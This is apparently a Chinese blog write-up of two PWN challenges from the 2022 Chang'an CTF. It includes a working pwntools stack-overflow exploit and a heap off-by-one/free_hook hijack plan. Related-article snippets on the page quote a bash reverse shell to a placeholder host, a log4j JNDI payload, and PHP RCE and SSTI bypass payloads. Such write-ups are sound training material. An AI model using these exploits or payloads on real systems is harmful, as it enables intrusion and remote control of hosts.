长安“战疫“网络安全卫士守护赛--PWN

原创 已于 2022-03-10 11:50:49 修改 · 445 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #linux #pwn

于 2022-01-09 00:22:15 首次发布
本文解析了两道Pwn挑战题的解决过程。第一题通过栈溢出技术获取shell权限;第二题利用堆溢出和off-by-one漏洞实现内存地址泄露,并最终通过劫持free_hook指针获得shell。

今天早上定了闹钟起来干题,还没怎么睡醒
这里我把前两道pwn题给分析一下

pwn1

例行检查:在这里插入图片描述
32位,没有开canary保护,没有pie,扔到IDA中
在这里插入图片描述buf大小0x38,判断为栈溢出,还有后门,心中正在窃喜,长安这道签到题是真简单呀,但做了之后发现这里main函数最后的返回还应注意一下
在这里插入图片描述
调用完read之后,不是leave retn,而是多了一行lea esp ,[ecx-4],这里应注意一下,将ecx-4的地址给了esp,相当于返回到了ecx-4的地址,(注意lea 区别于mov,mov传送的是地址所指的内容,而lea只是地址).,我们把返回地址写在ecx-4的地址,之后再用程序leak出的地址算出偏移,就可以get shell了,总体来说还可以,下边直接放出exp
exp:

#coding=utf-8
from pwn import*
io = remote('113.201.14.253',16088)
context(log_level='debug',os='linux',arch='i386')

shell_addr = 0x8048540

io.recvuntil('Gift:0x')
leak = int(io.recv(8),16)
success(hex(leak))
io.recvuntil('\n')

io.sendline(p32(shell_addr) + 'b'*0x30 + p32(leak+4))
io.interactive()

在这里插入图片描述
拿到flag!!

pwn2

检查程序:在这里插入图片描述
64位,保护机制全开,扔到IDA中分析,
是一道堆题,功能齐全,在add()函数中存在off by one 漏洞,
在这里插入图片描述
我们可以利用by one 改写pre_inuse位,构造overlap,残留指针,leak出libc地址,然后再次构造overlap,劫持free_hook指针,劫持到system()即可,然后free掉’/bin/sh\x00’从而拿到shell.
完整exp:

from pwn import
最低0.47元/天 解锁文章
长安网络安全卫士守护部分writeup
weixin_52829570的博客
01-08 1887
解题过程 题目一 八卦迷宫 用画图工具手工连接,然后将路上的图表和字相对应 按顺序打出,然后根据题目要求换成全拼,加上图片里的前缀cazy{}提交 flag为: cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang} 题目二 西安加油 用wireshark打开发现一个很大而且带有很多base64编码的流量 追踪http流,复制去解base64,得到一个zip 解压得
长安役“网络安全卫士守护
Keepb1ue的博客
01-14 2392
文章目录Webshiro?RCE_No_ParaFlag配送中心Misc迷宫朴实无华的取证无字天书stegbinaryCryptono_cry_no_bbno_cry_no_canno_math_no_cryReversecombat_slogancute_doge Web shiro? 很明显不是一般的shiro,很多命令都不能用,又是Sprintboot框架,那可以尝试log4j RCE 发现存在WAF检测,bypass测试绕过:${${::-j}ndi:rmi://r5qm53.dnslog.cn/
长安网络安全卫士守护 Shiro?
FSecurity的博客
01-14 2722
题:Shiro? 需要准备的环境: 反弹shell需要准备VPS、JNDI-Injection-Exploit工具启动rmi和ldap服务 JNDI-Injection-Exploit 需要jdk、mvn环境编译 VPS centos7 mvn jdk 打开题 测试存在漏洞 这里我用的是VPS的外网地址 成功获取到请求响应 反弹shell步骤 bash -i >&/dev/tcp/x.x.x.x/1111 0>&1 bash -c {echo,上面命令base64编码
长安网络安全卫士守护_crypto_复现
M3ng@L的博客
01-13 3882
长安网络安全卫士守护_Crypto math 涉及的知识点:RSA加密未知模数,已知p对q的逆元以及q对p的逆元求RSA的模数N 题目描述 题目没有描述,只有已知量c,e,d,pinvq,qinvp 公式推导 已知pinvq,qinvp求n,这样我们才能求得m=cd(mod n)m=c^d(mod~n)m=cd(mod n) 所谓pinvq也就是p∗pinvq≡1(mod q)p*pinvq\equiv 1(mod~q)p∗pinvq≡1(mod q) qi
长安网络安全-wp
qq_45603443的博客
01-11 6175
长安网络安全-wpWebtpshiro?Baby_Uploadflag配送中心flaskRCE_No_ParaCryptono_can_no_bbmathLinearEquationsno_mah_no_cryno_cry_no_canMiscez_Encryptbinary西安加油Ez Steg八卦迷宫无字天书朴实无华的取证Reverselemoncombat_slogancute_dogehello_pyPwnpwn1重点来了 Web tp 文件上传+phar反序列化 <?php nam
题目源码2024年强网杯全国网络安全 PWN题目old-fashion-apache源码
最新发布
11-07
网络安全领域中,CTF(Capture The Flag,夺旗)是一种流行的信息安全形式,旨在通过各种信息安全技能的比拼,提高参与者的技术水平和应对网络攻击的能力。其中,PWN是CTF比中的一个常见项目,它主要关注...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面中,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential ...
题目源码2024年强网杯全国网络安全 PWN题目baby-heap源码
11-07
2024年强网杯全国网络安全是针对网络安全爱好者的一次盛会,尤其是PWN题目,这类题目往往要求参者利用软件中的漏洞,获取或提升权限。本次提供的“baby-heap”源码,很可能是一个针对堆内存管理的漏洞利用...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
长安网络安全Writeup
Le1a's Blog
01-12 4044
Web RCE_No_Para 无参RCE ?1=system('tac flag.php');&code=eval(current(current(get_defined_vars()))); flask admin?static.js? 然后发现传参点:?name= 简单试了下SSTI,发现过滤了引号等符号 考虑attr结合16进制来绕过 {{a|attr(%27\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f%27)|attr(%27\x5f\x5f\x62\x6
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF的入门和PWN的学习,是入门指导。
长安网络安全卫士守护crypto
永远相信美好的事情即将发生
03-24 8157
cry1 题目如下,就是一个脚本: from Crypto.Util.number import* from secret import flag,key assert len(key) <= 5 assert flag[:5] == b'cazy{' def can_encrypt(flag,key): block_len = len(flag) // len(key) + 1 new_key = key * block_len return bytes([i^j for
长安网络安全卫士守护 WriteUp
as you know, nlp is fantasitc!
01-09 2883
长安守护 1、RCE_No_Para 参考一篇比较详细的bloghttps://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#%E6%B3%951%EF%BC%9Agetenv 源码 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { if(!preg_match('/session|end|next|header|dir
2022 长安网络安全卫士守护 WriteUp
热门推荐
mumuzi的博客
01-08 1万+
2022 长安部分wp
2021长安网络安全卫士守护 misc部分writeup
ShenZ的博客
01-13 1074
长安网络安全卫士守护 部分writeup MISC朴实无华的取证西安加油 MISC 朴实无华的取证 λ volatility_2.6_win64_standalone.exe -f D:\download\xp_sp3\xp_sp3.raw --profile=WinXPSP2x86 cmdline filescan取出flag.zip和flag.png λ volatility_2.6_win64_standalone.exe -f D:\download\xp
2021长安杯签到pwn
pointerr的博客
01-20 286
checksec: 发现32位,开了NX,没别的保护,使用ida打开: 发现打印出了一个gift,直接运行,竟然是buf的栈地址。 binsh地址也知道了, 首先填充栈,其中一开始是binsh的地址, 然后填充栈,最后覆盖ebp为栈地址 思路直接打开: from pwn import* p = process("./pwn1") #p = remote("113.201.14.253",16088) p.recvuntil("Gift:") leak = int(p.recv(10),16) p.sen
长安网络安全卫士守护部分wp
m0_56194555的博客
01-08 3010
长安网络安全卫士守护部分wp 然后就是朴实无华的取证那个题 不知道是大小写的原因还是啥交不上,无字天书卡到最后那个长得好像摩斯密码的地方,收获满满,继续努力。
长安网络安全卫士守护Writeup
末初 · mochu7
01-08 4397
长安Writeup
第五空间网络安全pwn-bountyhunter
CHAWUCIREN1的博客
09-20 478
先运行一下 查看一下保护机制 开启了NX保护 丢入IDApro里面查看一下 查看一下vulnerable_function()函数 栈空间是144,但是可以读入的大小是0X200,常规的栈溢出题目 查看buf栈空间 shift+F12查看字符串 发现system和/bin/sh,构造payload ...
De1CTF网络安全逆向与pwn技术解析
标签中的“pwn”和“逆向”是对描述中提到的CTF项内容的重复,而“网络安全”则明确指出这是一个针对网络安全领域技能的竞。标签的作用在于快速标识出压缩包内容的类型和用途,方便参与者或研究者快速定位和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值